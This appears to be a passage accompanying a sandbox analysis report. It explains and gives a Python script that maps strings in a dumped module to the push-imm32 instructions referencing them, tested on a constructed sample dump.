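The Strings block above pairs each format string with the address of the instruction that references it (the xref), and the decompiled listing shows those references as `_push("…")`, i.e. the string's virtual address carried as the immediate of a `push imm32`. As an added example, not code from the Joe Sandbox report, from the sample, or from ntdll, the following Python reproduces that lookup on a raw module dump: it finds every occurrence of a string and every `push imm32` whose immediate equals that string's VA, assuming the dump was captured from a module mapped at the base the report gives ("Offset: 01EC0000, based on PE: true") so that runtime-relocated immediates already match the dump addresses. The dump it scans is constructed inline; the report's own `.sdmp` files are not used.

```python
"""Recover string xrefs from a dumped module by scanning for push-imm32.

Added example; not part of the sandbox report. Assumes:
  - the dump is the module's in-memory image, mapped at MODULE_BASE
    (the report's "Offset: 01EC0000"), so 32-bit immediates inside it
    are already relocated and equal to dump-relative VAs;
  - string references are `push imm32` (opcode 0x68), the 32-bit form
    seen in the decompiled RtlpWaitForCriticalSection-style listing.
Other addressing forms (mov reg, imm32; x64 RIP-relative lea) are not
covered, and a byte-pattern hit should be confirmed by disassembling at
the reported address, since data can happen to look like an opcode.
"""
import struct

MODULE_BASE = 0x01EC0000  # base taken from the report's Memory Dump Source


def find_all(dump, pattern):
    """Return every dump offset at which `pattern` occurs (overlaps allowed)."""
    hits = []
    i = dump.find(pattern)
    while i != -1:
        hits.append(i)
        i = dump.find(pattern, i + 1)
    return hits


def find_string(dump, text):
    """Offsets of the NUL-terminated ASCII string `text` inside the dump."""
    return find_all(dump, text.encode("ascii") + b"\x00")


def find_push_xrefs(dump, base, target_va):
    """VAs of `push imm32` instructions whose immediate equals target_va."""
    pattern = b"\x68" + struct.pack("<I", target_va)
    return [base + off for off in find_all(dump, pattern)]


def string_xrefs(dump, base, text):
    """Map each VA where `text` lives to the push-imm32 sites referencing it.

    Mirrors the report's "String, xrefs: <addr>" lines: key is the string's
    VA, value is the list of instruction VAs that push it.
    """
    result = {}
    for off in find_string(dump, text):
        va = base + off
        result[va] = find_push_xrefs(dump, base, va)
    return result


def build_sample_dump():
    """Constructed dump (not a real capture) for the example.

    Layout: the string at RVA 0x1000, one `push <string VA>` at RVA 0x2000,
    and an unrelated `push 0x65` at RVA 0x2100 (the debug-print level seen
    in the listing) so the scan has to be selective.
    """
    dump = bytearray(0x3000)
    s = b"RTL: Re-Waiting\n\x00"
    dump[0x1000:0x1000 + len(s)] = s
    dump[0x2000] = 0x68
    dump[0x2001:0x2005] = struct.pack("<I", MODULE_BASE + 0x1000)
    dump[0x2100] = 0x68
    dump[0x2101:0x2105] = struct.pack("<I", 0x65)
    return bytes(dump)


if __name__ == "__main__":
    sample = build_sample_dump()
    for va, sites in string_xrefs(sample, MODULE_BASE, "RTL: Re-Waiting\n").items():
        print("string at %08X, xrefs: %s" % (va, ", ".join("%08X" % s for s in sites)))
```

On a real capture, `open(path, "rb").read()` replaces `build_sample_dump()` and `MODULE_BASE` is the dump's own base; a string with zero xrefs under this scan is not proof it is unreferenced, only that no 32-bit push carries its address.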